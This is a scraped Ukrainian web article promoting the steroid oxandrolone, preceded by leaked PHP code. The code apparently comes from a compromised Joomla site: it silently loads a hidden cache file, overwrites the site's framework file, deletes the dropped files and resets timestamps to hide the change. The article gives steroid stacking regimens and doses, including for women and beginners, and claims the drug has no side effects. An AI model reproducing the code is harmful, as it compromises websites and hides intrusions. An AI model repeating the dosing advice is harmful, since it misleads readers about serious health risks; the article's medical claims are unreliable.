$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Оксандролон | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Оксандролон

ОксандролонОксандролон в розумних дозах не дає жодних побічних явищ. Це і зрозуміло, бо початкове призначення препарату було для жінок і дітей. Це один з не багатьох стероїдів, який не викликає передчасної затримки фізичного розвитку у дітей, тому що він не сприяє закриттю епофізних з'єднань, тому препарат застосовується, головним чином, у дітей для стимуляції росту тіла і у жінок - при остеопорозі. Препарат викликає (якщо взагалі викликає) дуже слабкі явища маскулінізації. Ця якість робить його улюбленим засобом атлеток, тому що при дозі 10-15 мг на день у них вкрай рідко спостерігаються зовнішні прояви мужності. Оксандролон дуже люблять спортсмени бодібілдингу та пауерліфтингу. У першу чергу це пов'язано з тим, що він сприяє великому росту сили. Це пов'язано з тим, що порушується синтез фосфату креатину в м'язовій клітці і при цьому не накопичується рідина. Штангісти і силовики, які не хочуть переходити в більш високу категорію користуються цим, тому що препарат дає їм можливість стати сильнішими, не додаючи маси. Хороші результати дає одночасний прийом оксандролону та 120-140мкг Кленбутерола на день. Хоча сам оксандролон і не сприяє помітному росту м'язів, але помітно підсилює вплив багатьох стероїдів на організм, особливо добре комбінується з Дека-дураболіном, Діанаболом і різними варіантами тестостерону, тому що, при прийомі оксандролону, виникає приріст сили при одночасному прийомі Дека-дураболіну, Діанабола або тестостерону, які накопичують рідину і сприяють сильному росту тканини, результатом є додаткова м'язова маса. Поєднання з 200мг Дека-дураболіну на тиждень, 500мг тестостерону енантат на тиждень і 25мг оксандролону в день викликає у більшості атлетів гарний приріст сили і маси. Дека-дураболін має виражену анаболічну дію і стимулює синтез протеїнів, оксандролон підвищує силу, а тестостерон робить атлета агресивнішим під час тренувань і прискорює регенерацію.

Друга причина, по якій так люблять оксандролон, в тому, що цей препарат не ароматизується ні при якій дозі. Як вже згадувалося, певна частина тестостерону, який знаходиться в крові, перетворюється на естрогени. Цей процес ароматизації по різному виражений у різних атлетів, в залежності від схильності до нього. При оксандролоні мускулатура ніколи не набуває водянистого виду, що дозволяє вважати препарат хорошим засобом при підготовці до змагань. У цій фазі, перш за все, важливо тримати рівень естрогенів на більш низькому рівні, тому що естрогени програмують організм, навіть при низькокалорійній дієті, на скупчення води.

У поєднанні з дієтою оксандролон допомагає зробити мускулатуру твердою і пружною. Хоча сам він не руйнує жири, він все ж таки грає в цьому деяку роль. Тому що ця хімічна речовина пригнічує у багатьох атлетів апетит. Оксандролон може викликати щось на зразок відчуття тяжкості в шлунку, що викликає у деяких атлетів нудоту і блювоту, якщо таблетки прийняті під час їжі. В інструкції із застосування італійського оксандролону, препарату приписується вплив на діяльність шлунково-кишкового тракту. Тому деякі атлети і говорять про регулярні проноси. Хоча це й не дуже приємне явище, це все ж таки допомагає атлетові в його намірі розтопити жир і виглядати більш сухорлявим. Ті, хто тренуються для змагань або цікавляться приростом якісної мускулатури, повині комбінувати оксандролон з такими стероїдами як Вінстрол, Параболан, Мастерон, Прімоболан і тестостерон пропіонат. Поєднання з 50мг Вінстрола через день, 50мг Тестостерон пропіонату кожні два дні і 25мг оксандролону щоденно показало себе дуже ефективним.

Ще одна перевага здатності оксандролону до неароматізаціі, в тому, що атлети, які страждають підвищеним кров'яним тиском при сильних андрогенних стероїдах отримують від них гінекомастію, з цим препаратом не будуть мати ніяких проблем. Поєднання оксандролону з Дека-дураболіном є для цієї групи спортсменів бажаною альтернативою, якщо є проблема зі здоров'ям при застосуванні тестостерону, Діанабола або Анаполона 50. Атлети яким за 40, повинні використовувати переважно оксандролон.

Третя причина, яка говорить на користь оксандролону в тому, що ця хімічна речовина навіть у дуже високих дозах не має впливу на вироблення власного тестостерону. Пояснення: оксандролон не пригнічує вироблення гормонів в організмі. Справа в тому, що він не має негативного впливу на дугу гіпоталамус-гіпофіз-яєчка, тобто при його прийомі яєчка не сигналізують гіпоталамусу про необхідність зниження і повне припинення викиду гормону, як це відбувається при прийомі більшості анаболічних стероїдів. Це особливе становище оксандролону легко пояснюється тим, що його хімічна речовина не ароматизується в естрогени, оскільки як пише доктор Мауро Г. де Паскалі у своїй книзі "Побічні явища анаболічних стероїдів - Факти, Вигадки і Лікування" на стор.23: "передбачається, що естрогени виникають при ароматизації тестостерону та інших анаболічних стероїдів у відділах мозку і гіпоталамуса, знижують секрецію лютеїнізуючого гормону, а, отже, і вироблення тестостерону". Американський лікар, доктор Роберт Керр підтверджує це в книзі "Практичне застосування анаболічних стероїдів атлетами", де на стор 32 написано: "Якщо давати оксандролон (Анавар) здоровому чоловікові у високих дозах, то в цьому випадку він не знижує ні кількості насіння, ні кількості сперми і зовсім не перетворюється на естрогени. Тому Гудманн і Гільманн зробили з цього висновок, що механізм зворотного зв'язку активізується швидше концентрацією естрогенів, ніж кількістю тестостерону".

Тому оксандролон легко комбінується з Андріолом. Тому що Андріол в дозі до 240мг на день не ароматизується і вироблення організмом гормонів ні в якій мірі не зачіпається. Щоденний прийом 280мг Андріола і 25мг оксандролону дають хороші результати в прирості сили, а у новачків в стероїдних курсах і м'язової маси без надмірного водонакопичення, а також без значного впливу на вироблення власного тестостерону. Що стосується оксандролону, то 8-12 таблеток на день чоловікам і жінкам 5-6, здається, приносять хороші результати. Легке правило щоденного прийому 0.25мг препарату на кілограм ваги виправдало себе на практиці, таблетки, як правило, беруть 2-3 рази на день відразу після їжі, і таким чином досягається оптимальна резорбція (оптимальне всмоктування) препарату, його хімічної речовини. Ті, у кого ж виникають при прийомі препарату шлунково-кишкові розлади, чинять вірно, приймаючи таблетки за годину - дві після їжі або взагалі відмовляються від нього. Оскільки Оксандролон мало токсичний і навряд чи викликає побічні явища, його приймають багато атлетів і тривалий проміжок часу. Але не варто застосовувати його кілька місяців без перерви, оскільки він, як майже всі оральні стероїди, алькулірований по 17-альфа і дає навантаження на печінку. Оксандролон - засіб широкого спектру дії, що застосовується різнобічно і в залежності від мети атлета. Жінки з чутливою реакцією на анаболічні стероїди досягають добрих результатів з комбінацією оксандролон + Прімоболан і/або Кленбутерол, вони не страждають при цьому явищами маскулінізації. І все ж жінки не повинні приймати препарат у дозі більше 6 таблеток на день, тому що в іншому випадку можуть виникнути обумовлені андрогенами побічні ефекти у вигляді ломки голосу, зниження тембру голосу, гіпертонії клітора і посиленого випадіння волосся.
 
Статті СТЕРОЇДИ Оксандролон